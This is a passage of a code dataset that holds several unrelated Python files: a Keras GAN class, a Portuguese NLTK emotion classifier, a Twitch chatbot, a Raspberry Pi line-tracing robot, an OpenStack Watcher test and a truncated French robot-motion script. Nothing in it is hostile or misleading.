Power/OneDrive/ponte/programmi/python/progetto2/AJ_lib')\nfrom AJ_draw import disegna as ds\n\n# train a generative adversarial network on a one-dimensional function\n# from keras.models import Sequential\n# from keras.layers import Dense, LeakyReLU, Reshape, Flatten, Conv1D, Dropout\n# from keras.models import load_model\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv1D, LeakyReLU, Dropout, Reshape, Conv1DTranspose, Flatten\n\nimport numpy as np\nimport pandas as pd\n\nclass learning_gan:\n\n # ███ ███ ██████ ██████ ███████ ██ ███████\n # ████ ████ ██ ██ ██ ██ ██ ██ ██\n # ██ ████ ██ ██ ██ ██ ██ █████ ██ ███████\n # ██ ██ ██ ██ ██ ██ ██ ██ ██ ██\n # ██ ██ ██████ ██████ ███████ ███████ ███████\n\n # define the standalone discriminator model\n def define_discriminator(self, n_inputs=2):\n '''\n modello discriminatore, testa del modello, impara a distinguere tra il dato reale e quello generato.\n n_inputs: (int) dimensione del dato reale\n return model: il modello\n '''\n 
model = Sequential()\n model.add(Dense(int(n_inputs/2), activation='relu', kernel_initializer='he_uniform', input_dim=n_inputs))\n model.add(Dropout(0.4))\n model.add(Dense(int(n_inputs/10), activation='relu', kernel_initializer='he_uniform'))\n model.add(Dropout(0.4))\n model.add(Dense(int(n_inputs/100), activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(1, activation='sigmoid'))\n # compile model\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n # define the standalone generator model\n def define_generator(self, latent_dim, n_outputs=2):\n '''\n generator model, the tail of the pipeline: it learns to create a sample that can be mistaken for a real one.\n latent_dim: (int) size of the latent space, which is just random numbers\n n_outputs: (int) size of the real sample; this is the generated sample that tries to imitate the real one\n return: model\n '''\n model = Sequential()\n model.add(Dense(int(n_outputs*1.5), activation='relu', kernel_initializer='he_uniform', input_dim=latent_dim))\n model.add(Dropout(0.4))\n model.add(Dense(int(n_outputs/10), activation='relu', kernel_initializer='he_uniform'))\n model.add(Dropout(0.4))\n model.add(Dense(int(n_outputs/100), activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(n_outputs, activation='linear'))\n return model\n\n # define the standalone convolutional generator model (TF2 only)\n def define_generator_tf2(self, latent_dim, n_outputs=2):\n '''\n this model only works with TF2\n generator model, the tail of the pipeline: it learns to create a sample that can be mistaken for a real one.\n latent_dim: (int) size of the latent space, which is just random numbers\n n_outputs: (int) size of the real sample; this is the generated sample that tries to imitate the real one\n return: model\n '''\n\n model = Sequential()\n\n # foundation: a (n_outputs/4) x 128 feature map\n n_nodes = 128 * int(n_outputs/4)\n\n model.add(Dense(n_nodes, input_dim=latent_dim))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((int(n_outputs/4), 128)))\n\n # upsample to n_outputs/2\n model.add(Conv1DTranspose(128, 4, strides=2, padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n\n # upsample to n_outputs\n model.add(Conv1DTranspose(128, 4, strides=2, padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv1D(1, int(n_outputs/4), activation='sigmoid', padding='same'))\n model.add(Flatten())\n return model\n\n # define the combined generator and discriminator model, for updating the generator\n def define_gan(self, generator, discriminator):\n '''\n complete GAN model, built by chaining the generator and the discriminator.\n The discriminator weights are frozen, so that during training only the generator is updated\n generator: generator model\n discriminator: discriminator model\n return: model\n '''\n # make weights in the discriminator not trainable\n discriminator.trainable = False\n # connect them\n model = Sequential()\n # add generator\n model.add(generator)\n # add the discriminator\n model.add(discriminator)\n # compile model\n model.compile(loss='binary_crossentropy', optimizer='adam')\n return model\n\n\n # ██████ █████ ████████ █████ ██████ ███████ ███ ██ ███████ ██████ █████ ████████ ██████ ██████\n # ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██\n # ██ ██ ███████ ██ ███████ ██ ███ █████ ██ ██ ██ █████ ██████ ███████ ██ ██ ██ ██████\n # ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██\n # ██████ ██ ██ ██ ██ ██ ██████ ███████ ██ ████ ███████ ██ ██ ██ ██ ██ ██████ ██ ██\n\n\n # generate n real samples with class labels\n def generate_real_samples(self, data, n):\n '''\n select a random sub-sample of the data.\n data: sample data, as a Pandas dataframe\n n: (int) number of samples to select\n return: data_selection, pandas dataframe with n samples inside, y, numpy array of ones of length n\n (y represents the class of the data, 1 meaning the samples are the real ones)\n '''\n data_selection = data.sample(n).reset_index(drop=True)\n y = np.ones((n, 1))\n return data_selection, y\n\n # generate points in latent space as input for the generator\n def generate_latent_points(self, latent_dim, n):\n '''\n generates points from the latent space. They are nothing more than gaussian-distributed values\n latent_dim: (int) size of the vector to feed to the generator\n n: (int) number of samples to generate\n return: x_input, numpy array with n samples of latent_dim random values\n '''\n # generate points in the latent space\n x_input = np.random.randn(latent_dim * n)\n # reshape into a batch of inputs for the network\n x_input = x_input.reshape(n, latent_dim)\n return x_input\n\n # use the generator to generate n fake examples, with class labels\n def generate_fake_samples(self, generator, latent_dim, n):\n '''\n fake-sample generator: it uses the generator model to predict a new, invented set of data\n generator: generator model\n latent_dim: (int) size of the latent-space vector, it must be as long as the first layer of the model\n n: (int) number of samples to generate\n return: X, numpy array with the invented data, y, numpy array of zeros of length n, the label of the fake data\n '''\n # generate points in latent space\n x_input = self.generate_latent_points(latent_dim, n)\n # predict outputs\n X = generator.predict(x_input)\n # create class labels\n y = np.zeros((n, 1))\n return X, y\n\n\n # ████████ ██████ █████ ██ ███ ██ ██ ███ ██ ██████\n # ██ ██ ██ ██ ██ ██ ████ ██ ██ ████ ██ ██\n # ██ ██████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███\n # ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██\n # ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ████ ██████\n\n\n # evaluate the discriminator and plot real and fake points\n def summarize_performance(self, data, epoch, generator, discriminator, latent_dim, verbose=False):\n '''\n function that scores the training\n data: training set as a pandas dataframe\n epoch: (int) training epoch\n generator: generator model\n discriminator: discriminator model\n latent_dim: (int) size of the latent-space vector, it must be as long as the first layer of the model\n verbose: boolean, if True print accuracy and plot\n return: epoch, acc_real (accuracy in identifying real data), acc_fake (accuracy in identifying fake data)\n '''\n # prepare real samples\n x_real, y_real = self.generate_real_samples(data, 100)\n # evaluate discriminator on real examples\n _, acc_real = discriminator.evaluate(x_real, y_real, verbose=0)\n # prepare fake examples\n x_fake, y_fake = self.generate_fake_samples(generator, latent_dim, 100)\n # evaluate discriminator on fake examples\n _, acc_fake = discriminator.evaluate(x_fake, y_fake, verbose=0)\n # summarize discriminator performance\n\n x_real, y_real = self.generate_real_samples(data, 1)\n x_fake, y_fake = self.generate_fake_samples(generator, latent_dim, 1)\n\n if verbose:\n print('epoch: ',epoch)\n print('how good the discriminator is to evaluate the real example',acc_real)\n print('how good the discriminator is to evaluate the fake example',acc_fake)\n # scatter plot real and fake data points\n ds().nuova_fig(1)\n X1 = np.arange(len(x_real.T[0]))\n ds().dati(x = X1, y = x_real.T[0], colore = palette[0], descrizione=\"real\")\n ds().dati(x = X1, y = x_fake.T, colore = palette[1], descrizione=\"fake\")\n ds().legenda()\n ds().porta_a_finestra()\n return epoch, acc_real, acc_fake\n\n # train the generator and discriminator\n def train(self, data, latent_dim, n_epochs=10000, n_batch=128, n_eval=2000, verbose = False, save = False):\n '''\n training function.\n data: training set as a pandas dataframe\n latent_dim: (int) size of the latent-space vector, it must be as long as the first layer of the model\n n_epochs: (int) total number of training epochs\n n_batch: (int) number of samples used for training; if a number larger than the number of rows of data is given, the value is clipped to the length of data\n n_eval: (int) every how many epochs the model is saved and the accuracy evaluated\n verbose: (boolean) if True the accuracy is printed every n_eval epochs and the plot is generated\n save: (boolean) if True the model is saved every n_eval epochs\n '''\n size_single_sample = data.shape[1]\n # # create the discriminator\n discriminator = self.define_discriminator(n_inputs = size_single_sample)\n # # create the generator\n generator = self.define_generator(latent_dim, n_outputs = size_single_sample)\n # # create the gan\n gan_model = self.define_gan(generator, discriminator)\n\n # determine half the size of one batch, for updating the discriminator\n # (clip against the number of rows, data.shape[0], not the number of columns)\n if n_batch>data.shape[0]:\n n_batch = data.shape[0]\n half_batch = int(n_batch / 2)\n sum_epoch, sum_acc_real, sum_acc_fake = [], [], []\n sum_d_loss_real, sum_d_loss_fake, sum_g_loss = [], [], []\n # manually enumerate epochs\n for i in range(n_epochs):\n # prepare real samples\n x_real, y_real = self.generate_real_samples(data, half_batch)\n # prepare fake examples\n x_fake, y_fake = self.generate_fake_samples(generator, latent_dim, half_batch)\n # update discriminator\n d_loss_real = discriminator.train_on_batch(x_real, y_real)\n d_loss_fake = discriminator.train_on_batch(x_fake, y_fake)\n # prepare points in latent space as input for the generator\n x_gan = self.generate_latent_points(latent_dim, n_batch)\n # create inverted labels for the fake samples\n y_gan = np.ones((n_batch, 1))\n # update the generator via the discriminator's error\n g_loss = gan_model.train_on_batch(x_gan, y_gan)\n # evaluate the model every n_eval epochs\n if (i+1) % n_eval == 0:\n temp_epoch, temp_real, temp_fake = self.summarize_performance(data, i, generator, discriminator, latent_dim, verbose)\n sum_epoch.append(temp_epoch)\n sum_acc_real.append(temp_real)\n sum_acc_fake.append(temp_fake)\n sum_d_loss_real.append(d_loss_real[0])\n sum_d_loss_fake.append(d_loss_fake[0])\n sum_g_loss.append(g_loss)\n if save:\n self.save_model(generator, filename = 'generator_model_%03d.h5' % (i + 1))\n ds().nuova_fig(4)\n ds().dati(x = sum_epoch, y = sum_acc_real, colore=palette[0], descrizione='acc real')\n ds().dati(x = sum_epoch, y = sum_acc_fake, colore=palette[1], descrizione='acc fake')\n ds().legenda()\n ds().porta_a_finestra()\n\n ds().nuova_fig(5)\n ds().dati(x = sum_epoch, y = sum_d_loss_real, colore=palette[0], descrizione='loss dis real')\n ds().dati(x = sum_epoch, y = sum_d_loss_fake, colore=palette[1], descrizione='loss dis fake')\n ds().legenda()\n ds().porta_a_finestra()\n\n ds().nuova_fig(5)\n 
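# note (editor's assumption): figure 5 seems to be reused intentionally so the\n # generator loss below lands on the same axes as the discriminator losses\n # above, making the adversarial balance readable on one plot; change the\n # figure number if a separate plot is wanted.\n 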
ds().dati(x = sum_epoch, y = sum_g_loss, colore=palette[2], descrizione='loss gan')\n ds().legenda()\n ds().porta_a_finestra()\n\n\n # ███████ █████ ██ ██ ███████\n # ██ ██ ██ ██ ██ ██\n # ███████ ███████ ██ ██ █████\n # ██ ██ ██ ██ ██ ██\n # ███████ ██ ██ ████ ███████\n\n\n def save_model(self, model, filename = 'model'):\n '''\n saves the model in h5 format\n model: model to save\n filename: file name\n '''\n model.save(filename)\n\n def load_model(self, filename):\n '''\n loads the model\n filename: file name, including the extension\n '''\n return load_model(filename)\n","sub_path":"AJ_models_GAN_tf2.py","file_name":"AJ_models_GAN_tf2.py","file_ext":"py","file_size_in_byte":16073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"388209406","text":"import nltk\n\nbase = [('eu sou admirada por muitos','alegria'),\n ('me sinto completamente amado','alegria'),\n ('amar e maravilhoso','alegria'),\n ('estou me sentindo muito animado novamente','alegria'),\n ('eu estou muito bem hoje','alegria'),\n ('que belo dia para dirigir um carro novo','alegria'),\n ('o dia está muito bonito','alegria'),\n ('estou contente com o resultado do teste que fiz no dia de ontem','alegria'),\n ('o amor e lindo','alegria'),\n ('nossa amizade e amor vai durar para sempre', 'alegria'),\n ('estou amedrontado', 'medo'),\n ('ele esta me ameacando a dias', 'medo'),\n ('isso me deixa apavorada', 'medo'),\n ('este lugar e apavorante', 'medo'),\n ('se perdermos outro jogo seremos eliminados e isso me deixa com pavor', 'medo'),\n ('tome cuidado com o lobisomem', 'medo'),\n ('se eles descobrirem estamos encrencados', 'medo'),\n ('estou tremendo de medo', 'medo'),\n ('eu tenho muito medo dele', 'medo'),\n ('estou com medo do resultado dos meus testes', 'medo')]\n\n# 1 Dataset without stop words\n#print(base)\n#print(base[1])\n\n# 2 Stop words\n\nstopwords = ['a', 'agora', 'algum', 'alguma', 'aquele', 'aqueles', 'de', 'deu', 'do', 'e', 'estou', 'esta', 'esta',\n 'ir', 'meu', 'muito', 'mesmo', 'no', 'nossa', 'o', 'outro', 'para', 'que', 'sem', 'talvez', 'tem', 'tendo',\n 'tenha', 'teve', 'tive', 'todo', 'um', 'uma', 'umas', 'uns', 'vou']\n\nstopwordsnltk = nltk.corpus.stopwords.words('portuguese')\n#print(stopwordsnltk)\n\ndef removestopwords(texto):\n frases = []\n for (palavras, emocao) in texto:\n semstop = [p for p in palavras.split() if p not in stopwords]\n frases.append((semstop, emocao))\n return frases\n\n#print(removestopwords(base))\n\n# 3 Stop words from nltk\n\n# 4 Stemming\n\ndef aplicastemmer(texto):\n stemmer = nltk.stem.RSLPStemmer()\n frasesstemming = []\n for (palavras, emocao) in texto:\n comstemming = [str(stemmer.stem(p)) for p in palavras.split() if p not in stopwordsnltk]\n frasesstemming.append((comstemming, emocao))\n return frasesstemming\n\nfrasescomstemming = aplicastemmer(base)\nprint(frasescomstemming)\n\n# word extraction\n\ndef buscapalavras(frases):\n todaspalavras = []\n for (palavras, emocao) in frases:\n todaspalavras.extend(palavras)\n return todaspalavras\n\npalavras = buscapalavras(frasescomstemming)\n#print(palavras)\n\n# stem frequency\n\ndef buscafrequencia(palavras):\n palavras = nltk.FreqDist(palavras)\n return palavras\n\nfrequencia = buscafrequencia(palavras)\n#print(frequencia.most_common(50))\n\n# based on the frequency, extract the final list without repetition\n\ndef buscapalavrasunicas(frequencia):\n freq = frequencia.keys()\n return freq\n\npalavrasunicas = buscapalavrasunicas(frequencia)\n#print(palavrasunicas)\n\n# extraindo as 
características de cada frase\n\ndef extratorpalavras(documento):\n doc = set(documento)\n caracteristicas = {}\n for palavra in palavrasunicas:\n caracteristicas['%s' % palavra] = (palavra in doc)\n return caracteristicas\n\ncaracteristicasfrase = extratorpalavras(['tim', 'gole', 'nov'])\n#print(caracteristicasfrase)\n\nbasecompleta = nltk.classify.apply_features(extratorpalavras, frasescomstemming)\n#print(basecompleta[0])\n\n'''\nclassificador = nltk.NaiveBayesClassifier.train(basecompleta)\n\nteste = 'genial'\nteste_stemming = []\nfor (palavras) in teste.split():\n filtrado = [e for e in palavras.split()]\n # teste_stemming.append(str(stemmer.stem(filtrado[0])))\n#print(teste_stemming)\nprint(classificador.classify(extrator_caracteristicas(teste_stemming)))\n'''","sub_path":"ciencia_de_dados/iaexpert/Mineração de Emoção em Textos Python NLTK/data/mineracao.py","file_name":"mineracao.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"647306287","text":"############################################################################\r\n# Chris Given's Twitch Chatbot\r\n# Last modified: 7:10 AM, 8/27/18\r\n# Recent changelog:\r\n# - Added cooldowns for data collection and commands\r\n# - Added data collection intervals:\r\n# - Allows the game to be saved as an instance variable\r\n# - So when people ask for game you can prevent another API call\r\n# - NOTE: added dependency for schedule module\r\nimport irc.bot\r\nimport requests\r\nfrom time import gmtime, strftime, time\r\nfrom schedule import every, run_pending\r\n\r\nclass Bot(irc.bot.SingleServerIRCBot):\r\n def __init__(self, username, clientID, token, channel):\r\n self.client_id = clientID\r\n self.token = token\r\n self.channel = \"#\" + channel\r\n self.game = None\r\n self.title = None\r\n\r\n self.lastCommandTime = time()\r\n self.commands = [\"game\", \"ribbit\",]\r\n\r\n # Get the channel id for API-based functions\r\n url = \"https://api.twitch.tv/helix/users?login={}\".format(channel)\r\n headers = {\"Client-ID\": clientID}\r\n response = requests.get(url, headers = headers).json()\r\n self.channelID = response[\"data\"][0][\"id\"]\r\n\r\n # Cooldowns for certain functions\r\n # Data collection: Get game and title every n seconds\r\n # - NOTE: You only get 30 API calls per minute without a bearer token.\r\n # Commands: Bot will not respond if a command has been issued in n seconds\r\n self.cooldowns = {\"dataCollection\": 60,\r\n \"commands\": 3,}\r\n self.collect()\r\n every(self.cooldowns[\"dataCollection\"]).seconds.do(self.collect)\r\n\r\n # Information for Twitch IRC server\r\n server = \"irc.chat.twitch.tv\"\r\n port = 6667\r\n irc.bot.SingleServerIRCBot.__init__(self, [(server, port, \"oauth:\" + token)], username, username)\r\n\r\n # ========== Event Handlers ========== #\r\n # These handle messages from the IRC server\r\n # USERNOTICE: (Re)subscriptions, raids, and rituals\r\n # CLEARCHAT: Bans and timeouts\r\n # ROOMSTATE: Changes to room (slow mode, r9k, etc.)\r\n # HOSTTARGET: Channel hosts/unhosts\r\n # PUBMSG: Public message (all twitch chat msgs come here)\r\n # All handlers have a c (connection) and e (event) parameter.\r\n # The events hold important information about each message.\r\n # The connection is required to send messages (c.privmsg).\r\n def on_welcome(self, c, e):\r\n c.cap('REQ', ':twitch.tv/membership')\r\n c.cap('REQ', ':twitch.tv/tags')\r\n c.cap('REQ', ':twitch.tv/commands')\r\n 
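# the CAP REQ lines above opt in to Twitch IRC extensions: membership\r\n # (JOIN/PART events), tags (per-message metadata such as display-name) and\r\n # commands (USERNOTICE, CLEARCHAT, ...), which the handlers below rely on\r\n 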
c.join(self.channel)\r\n\r\n def on_usernotice(self, c, e):\r\n months = 0\r\n name = \"\"\r\n for tag in e.tags:\r\n if tag[\"key\"] == \"msg-param-months\":\r\n months = int(tag[\"value\"])\r\n if tag[\"key\"] == \"display-name\":\r\n name = tag[\"value\"]\r\n if months >= 3:\r\n print(\"PepoDance {} has subscribed for {} months! PepoDance\".format(name, months))\r\n\r\n def on_clearchat(self, c, e):\r\n target = e.arguments[0]\r\n # a CLEARCHAT with a ban-duration tag is a timeout; without one it is a permanent ban\r\n ban = not any(tag[\"key\"] == \"ban-duration\" for tag in e.tags)\r\n if ban:\r\n c.privmsg(self.channel, \"{} has been obliterated.\".format(target))\r\n\r\n def on_roomstate(self, c, e):\r\n pass\r\n\r\n def on_hosttarget(self, c, e):\r\n pass\r\n\r\n def on_pubmsg(self, c, e):\r\n run_pending()\r\n message = \" \".join(e.arguments)\r\n # look the sender's display-name up by tag key instead of by position\r\n name = \"\"\r\n for tag in e.tags:\r\n if tag[\"key\"] == \"display-name\":\r\n name = tag[\"value\"]\r\n currentTime = strftime(\"%H:%M:%S\", gmtime())\r\n print(currentTime, \"-\", name + \":\", message)\r\n # guard against empty messages and unknown commands (which return None)\r\n if message and message[0] == \"!\" and time() - self.lastCommandTime > self.cooldowns[\"commands\"]:\r\n response = self.do_command(e.arguments, name)\r\n if response:\r\n c.privmsg(self.channel, response)\r\n\r\n # Collect game and title information\r\n # This saves it so it can be on demand when someone asks for it instead of having to wait for API calls\r\n # which might slow down the bot.\r\n def collect(self):\r\n response = requests.get(\"https://api.twitch.tv/helix/streams?user_id={}\".format(self.channelID),\r\n headers={\"Client-ID\": self.client_id}).json()\r\n try:\r\n gameID = response[\"data\"][0][\"game_id\"]\r\n response = requests.get(\"https://api.twitch.tv/helix/games?id={}\".format(gameID),\r\n headers={\"Client-ID\": self.client_id}).json()\r\n try:\r\n self.game = response[\"data\"][0][\"name\"]\r\n except KeyError:\r\n self.game = \"an unlisted game\"\r\n except IndexError:\r\n self.game = \"offline\"\r\n\r\n # Execute a command when the first character of a chat message is \"!\".\r\n def do_command(self, arguments, name):\r\n command = arguments[0][1:]\r\n if command not in self.commands:\r\n return\r\n # update the cooldown timestamp before returning the response\r\n self.lastCommandTime = time()\r\n if command == \"ribbit\":\r\n return \"/me ribbits.\"\r\n elif command == \"game\":\r\n return \"{} is playing {}.\".format(self.channel[1:], self.game)\r\n\r\ndef main():\r\n with open(\"client.txt\") as cl:\r\n client = cl.read()\r\n with open(\"token.txt\") as tok:\r\n token = tok.read()\r\n username = \"codetoad\"\r\n channel = \"codetoad\"\r\n bot = Bot(username, client, token, channel)\r\n try:\r\n bot.start()\r\n except KeyboardInterrupt:\r\n bot.disconnect()\r\n print()\r\n exit()\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"updated/chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"179840394","text":"import RPi.GPIO as GPIO\nimport time\n\ndef setup():\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n\n global MotorLeft_A, MotorLeft_B, MotorLeft_PWM\n global MotorRight_A, MotorRight_B, MotorRight_PWM \n MotorLeft_A = 12\n MotorLeft_B = 11\n MotorLeft_PWM = 35\n MotorRight_A = 15\n MotorRight_B = 13\n MotorRight_PWM = 37\n\n global trig, echo\n trig = 33\n echo = 31\n\n global otd, otb, ota, otc, ote\n otd = 16\n otb = 18\n ota = 22\n otc = 40\n ote = 32\n\n GPIO.setup(MotorLeft_A, GPIO.OUT)\n GPIO.setup(MotorLeft_B, GPIO.OUT)\n GPIO.setup(MotorLeft_PWM, GPIO.OUT)\n GPIO.setup(MotorRight_A, GPIO.OUT)\n GPIO.setup(MotorRight_B, GPIO.OUT)\n GPIO.setup(MotorRight_PWM, GPIO.OUT)\n\n GPIO.setup(trig, GPIO.OUT)\n GPIO.setup(echo, 
GPIO.IN)\n\n GPIO.setup(otd, GPIO.IN)\n GPIO.setup(otb, GPIO.IN)\n GPIO.setup(ota, GPIO.IN)\n GPIO.setup(otc, GPIO.IN)\n GPIO.setup(ote, GPIO.IN)\n\n global LeftPwm, RightPwm\n LeftPwm = GPIO.PWM(MotorLeft_PWM, 100)\n RightPwm = GPIO.PWM(MotorRight_PWM, 100)\n\n LeftPwm.start(0)\n RightPwm.start(0)\n\n global forward0, forward1, backward0 , backward1\n forward0 = False\n forward1 = True\n\n backward0 = True\n backward1 = False\n\n\ndef leftmotor(x):\n if x == True:\n GPIO.output(MotorLeft_A, GPIO.HIGH)\n GPIO.output(MotorLeft_B, GPIO.LOW)\n elif x == False:\n GPIO.output(MotorLeft_A, GPIO.LOW)\n GPIO.output(MotorLeft_B, GPIO.HIGH)\n else:\n print('Config Error')\n\n\ndef rightmotor(x):\n if x == True:\n GPIO.output(MotorRight_A, GPIO.LOW)\n GPIO.output(MotorRight_B, GPIO.HIGH)\n elif x == False:\n GPIO.output(MotorRight_A, GPIO.HIGH)\n GPIO.output(MotorRight_B, GPIO.LOW)\n else:\n print('Config Error')\n\ndef stop():\n GPIO.output(MotorLeft_PWM, GPIO.LOW)\n LeftPwm.ChangeDutyCycle(0)\n\n GPIO.output(MotorRight_PWM, GPIO.LOW)\n RightPwm.ChangeDutyCycle(0)\n\n\ndef getSensor():\n Sensor = [GPIO.input(otd),\n GPIO.input(otb),\n GPIO.input(ota),\n GPIO.input(otc),\n GPIO.input(ote)]\n return Sensor\n\ndef go_forward(rs, ls , t):\n leftmotor(forward0)\n GPIO.output(MotorLeft_PWM,GPIO.HIGH)\n rightmotor(forward0)\n GPIO.output(MotorRight_PWM,GPIO.HIGH)\n LeftPwm.ChangeDutyCycle(40 + (ls))\n RightPwm.ChangeDutyCycle(48 + (rs))\n time.sleep(t)\n\ndef ptL(rs, ls, b,t):\n leftmotor(backward0)\n GPIO.output(MotorLeft_PWM,GPIO.HIGH)\n rightmotor(forward0)\n GPIO.output(MotorRight_PWM,GPIO.HIGH)\n LeftPwm.ChangeDutyCycle(ls)\n RightPwm.ChangeDutyCycle(rs + 8)\n if b:\n time.sleep(t)\n\ndef ptR(rs, ls , b,t):\n leftmotor(forward0)\n GPIO.output(MotorLeft_PWM,GPIO.HIGH)\n rightmotor(backward0)\n GPIO.output(MotorRight_PWM,GPIO.HIGH)\n LeftPwm.ChangeDutyCycle(ls)\n RightPwm.ChangeDutyCycle(rs + 8)\n if b:\n time.sleep(t)\ndef TurnR():\n while True:\n sl = getSensor()\n if sl[4] == 0:\n go_forward(0,0,0.0001)\n if sl[2] == 1:\n ptR(50,50,True,0.1)\n elif sl[2] == 0:\n break\ndef TurnL():\n while True:\n sl = getSensor()\n if sl[0] == 0:\n go_forward(0,0,0.0001)\n if sl[2] == 1:\n ptL(50,50,True,0.1)\n elif sl[2] == 0:\n break\ndef linetracing():\n while True:\n go_forward(0,0,1)\n\ndef U_Turn():\n while True:\n sl = getSensor()\n if sl[2] == 1:\n ptR(50,50,True,0.1)\n elif sl[2] == 0:\n break\n\ndef maze(sl):\n\n if sl == [0,0,0,0,0]:\n go_forward(0,0,1)\n sl = getSensor()\n if sl == [0,0,0,0,0]:\n stop()\n GPIO.cleanup()\n\n\n\n elif sl[4] == 0:\n TurnR()\n\n elif sl[2] == 0:\n linetracing()\n\n elif sl[0] == 0:\n TurnL()\n\n elif sl == [1,1,1,1,1]:\n go_forward(0,0,0.2)\n sl = getSensor()\n if sl == [1,1,1,1,1]:\n U_Turn()\n\n\n\n\n\n return True\n\n\nif __name__ == '__main__':\n try:\n setup()\n while True:\n SensorList = getSensor()\n print(SensorList)\n gotracing = maze(SensorList)\n\n except KeyboardInterrupt:\n stop()\n GPIO.cleanup()\n\n\n","sub_path":"20171583linetracing.py","file_name":"20171583linetracing.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"124677347","text":"# -*- encoding: utf-8 -*-\n# Copyright (c) 2015 b<>com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or 
agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom unittest import mock\n\nfrom watcher.decision_engine.audit import continuous as continuous_handler\nfrom watcher.decision_engine.audit import oneshot as oneshot_handler\nfrom watcher.decision_engine.messaging import audit_endpoint\nfrom watcher.decision_engine.model.collector import manager\nfrom watcher.tests.db import base\nfrom watcher.tests.decision_engine.model import faker_cluster_state\nfrom watcher.tests.objects import utils as obj_utils\n\n\nclass TestAuditEndpoint(base.DbTestCase):\n def setUp(self):\n super(TestAuditEndpoint, self).setUp()\n self.goal = obj_utils.create_test_goal(self.context)\n self.audit_template = obj_utils.create_test_audit_template(\n self.context)\n self.audit = obj_utils.create_test_audit(\n self.context,\n audit_template_id=self.audit_template.id)\n\n @mock.patch.object(continuous_handler.ContinuousAuditHandler, 'start')\n @mock.patch.object(manager.CollectorManager, \"get_cluster_model_collector\")\n def test_do_trigger_audit(self, mock_collector, mock_handler):\n mock_collector.return_value = faker_cluster_state.FakerModelCollector()\n\n audit_handler = oneshot_handler.OneShotAuditHandler\n endpoint = audit_endpoint.AuditEndpoint(audit_handler)\n\n with mock.patch.object(oneshot_handler.OneShotAuditHandler,\n 'execute') as mock_call:\n mock_call.return_value = 0\n endpoint.do_trigger_audit(self.context, self.audit.uuid)\n\n self.assertEqual(mock_call.call_count, 1)\n\n @mock.patch.object(continuous_handler.ContinuousAuditHandler, 'start')\n @mock.patch.object(manager.CollectorManager, \"get_cluster_model_collector\")\n def test_trigger_audit(self, mock_collector, mock_handler):\n mock_collector.return_value = faker_cluster_state.FakerModelCollector()\n\n audit_handler = oneshot_handler.OneShotAuditHandler\n endpoint = audit_endpoint.AuditEndpoint(audit_handler)\n\n with mock.patch.object(endpoint.executor, 'submit') as mock_call:\n mock_execute = mock.call(endpoint.do_trigger_audit,\n self.context,\n self.audit.uuid)\n endpoint.trigger_audit(self.context, self.audit.uuid)\n\n mock_call.assert_has_calls([mock_execute])\n self.assertEqual(mock_call.call_count, 1)\n","sub_path":"watcher/tests/decision_engine/messaging/test_audit_endpoint.py","file_name":"test_audit_endpoint.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"436536522","text":"# coding: utf8\n\nimport serial\nimport threading,time\nimport thread\n\ncpmm = 250\n\n\n\ndef deplacer(t):\n x_mm = t[0]\n y_mm = t[1]\n x_clicks = x_mm * cpmm\n y_clicks = y_mm * cpmm\n deplacer_aux((x_clicks, y_clicks, angle))\n\ndef deplacer_aux(t): ##x,y en clicks, angle en millième de radians. 
Déplacement rectiligne entre deux points\n x,y,angle = t\n readPos()\n\n ##calcul de l'angle à donner en consigne\n pos_x, pos_y, pos_angle = position\n delta_x = x - pos_x\n delta_y = y - pos_y\n norme = pow((delta_x**2+delta_y**2),1/2)\n if delta_y > 0 :\n cos_cons_angle = delta_x / norme\n cons_angle = arccos(cos_cons_angle)\n else :\n cos_cons_angle = delta_x / norme\n cons_angle = -arccos(cos_cons_angle)\n delta_angle = cons_angle - pos_angle\n ##fin du calcul\n\n cmd(3,delta_angle) ## le robot tourne de delta_angle\n cmd(1,(norme,4000)) ## le robot avance de norme à la vitesse 4000\n cmd(3,angle-cons_angle) ## le robot se met dans l'angle donné en consigne\n\ndef aller(t): ##distance en mm, angle en °, case6.\n\tdistance,angle = t\n\tdistance += 32768\n\tangle += 32768\n\tdistance=min(distance,256**2-1)\n\tdistance=max(0,distance)\n\tangle = min(angle,256**2-1)\n\tangle = max(0,angle)\n\tArg1 = distance/256\n\tArg0 = distance%256\n\tArg3 = angle/256\n\tArg2 = angle%256\n\n\tmove.write(chr(6)+chr(4) +chr(Arg0) +chr(Arg1) +chr(Arg2) +chr(Arg3))\n\t\ndef allerSeq(t): ##distance en mm, angle en °, case 7.\n\tdistance,angle = t\n\tdistance += 32768\n\tangle += 